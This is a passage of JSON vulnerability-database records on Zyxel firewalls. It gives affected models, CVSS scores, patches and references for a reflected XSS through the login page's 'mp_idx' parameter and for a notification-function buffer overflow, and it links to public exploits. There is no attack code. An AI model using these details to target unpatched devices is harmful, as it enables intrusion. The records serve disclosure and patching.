            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg40w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "atp200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg40",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "vpn300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "zywall 110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg1900",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg20-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg60",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "vpn50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "atp800",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg60w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg310",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "usg210",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.31"
          },
          {
            "_id": null,
            "model": "nbg-418n modem",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "zyxel",
            "version": "v2"
          },
          {
            "_id": null,
            "model": "nas",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "zyxel",
            "version": "326"
          },
          {
            "_id": null,
            "model": "usg1100",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg310",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg210",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "zywall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "zyxel",
            "version": "1100"
          },
          {
            "_id": null,
            "model": "zywall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "zyxel",
            "version": "310"
          },
          {
            "_id": null,
            "model": "zywall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "zyxel",
            "version": "110"
          },
          {
            "_id": null,
            "model": "usg2200-vpn",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          },
          {
            "_id": null,
            "model": "usg1900",
            "scope": null,
            "trust": 0.6,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9955"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp500_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:atp800_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg110_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg20-vpn_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg20w-vpn_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg40_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg40w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg60_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:zyxel:usg60w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Aaron Bishop",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-9955",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2019-9955",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2019-13778",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-161390",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2019-9955",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-9955",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-9955",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-13778",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201904-785",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-161390",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-9955",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-9955"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9955"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized \u0027mp_idx\u0027 parameter. plural ZyXEL The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZyXELZyWall310 and other products are all products of ZyXEL Corporation of Taiwan, China. ZyXELZyWall310 is a 310 series VPN firewall device. ZyXELZyWall110 is a 110 series VPN firewall device. The ZyXELUSG1900 is a next-generation unified security gateway device. A cross-site scripting vulnerability exists in several Zyxel products that stems from the lack of proper validation of client data by web applications. An attacker could exploit the vulnerability to execute client code. ZyXEL ZyWall 310, etc. The following products are affected: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, Zy0WALL ",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-9955"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-9955"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=46706",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-9955"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-9955",
            "trust": 3.2
          },
          {
            "db": "PACKETSTORM",
            "id": "152525",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "46706",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-9955",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-9955"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9955"
          }
        ]
      },
      "id": "VAR-201904-0115",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390"
          }
        ],
        "trust": 1.2644510616666667
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          }
        ]
      },
      "last_update_date": "2024-11-23T23:04:48.660000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Zyxel security advisory for reflected cross-site scripting vulnerability of firewalls",
            "trust": 0.8,
            "url": "https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml"
          },
          {
            "title": "CVEs",
            "trust": 0.1,
            "url": "https://github.com/irbishop/CVEs "
          },
          {
            "title": "CVEs",
            "trust": 0.1,
            "url": "https://github.com/irbishop/CVE "
          },
          {
            "title": "nuclei-templates",
            "trust": 0.1,
            "url": "https://github.com/storenth/nuclei-templates "
          },
          {
            "title": "kenzer-templates",
            "trust": 0.1,
            "url": "https://github.com/Elsfa7-110/kenzer-templates "
          },
          {
            "title": "kenzer-templates",
            "trust": 0.1,
            "url": "https://github.com/ARPSyndicate/kenzer-templates "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-9955"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-161390"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9955"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.6,
            "url": "https://www.securitymetrics.com/blog/zyxel-devices-vulnerable-cross-site-scripting-login-page"
          },
          {
            "trust": 2.4,
            "url": "http://seclists.org/fulldisclosure/2019/apr/22"
          },
          {
            "trust": 2.4,
            "url": "http://packetstormsecurity.com/files/152525/zyxel-zywall-cross-site-scripting.html"
          },
          {
            "trust": 1.8,
            "url": "https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml"
          },
          {
            "trust": 1.8,
            "url": "https://www.exploit-db.com/exploits/46706/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9955"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9955"
          },
          {
            "trust": 0.7,
            "url": "https://www.exploit-db.com/exploits/46706"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/irbishop/cves"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778"
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-9955"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9955"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-13778",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-161390",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-9955",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2019-9955",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2019-05-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-13778",
            "ident": null
          },
          {
            "date": "2019-04-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-161390",
            "ident": null
          },
          {
            "date": "2019-04-22T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-9955",
            "ident": null
          },
          {
            "date": "2019-05-31T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-004359",
            "ident": null
          },
          {
            "date": "2019-04-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201904-785",
            "ident": null
          },
          {
            "date": "2019-04-22T20:29:00.447000",
            "db": "NVD",
            "id": "CVE-2019-9955",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2019-05-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-13778",
            "ident": null
          },
          {
            "date": "2019-04-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-161390",
            "ident": null
          },
          {
            "date": "2019-04-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-9955",
            "ident": null
          },
          {
            "date": "2019-05-31T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-004359",
            "ident": null
          },
          {
            "date": "2019-04-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201904-785",
            "ident": null
          },
          {
            "date": "2024-11-21T04:52:39.943000",
            "db": "NVD",
            "id": "CVE-2019-9955",
            "ident": null
          }
        ]
      },
      "title": {
        "_id": null,
        "data": "plural  ZyXEL Product cross-site scripting vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-004359"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201904-785"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202305-2121

    Vulnerability from variot - Updated: 2024-04-03 22:50

    A buffer overflow vulnerability in the notification function in Zyxel ATP series firmware versions 4.60 through 5.36 Patch 1, USG FLEX series firmware versions 4.60 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.60 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.60 through 5.36 Patch 1, VPN series firmware versions 4.60 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.60 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device. ATP100 firmware, ATP200 firmware, ATP500 firmware etc. ZyXEL The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202305-2121",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 60",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp800",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 60w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn1000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg 40w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 50w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 60",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg 40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 40w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg 60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp700",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 60w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007635"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33009"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
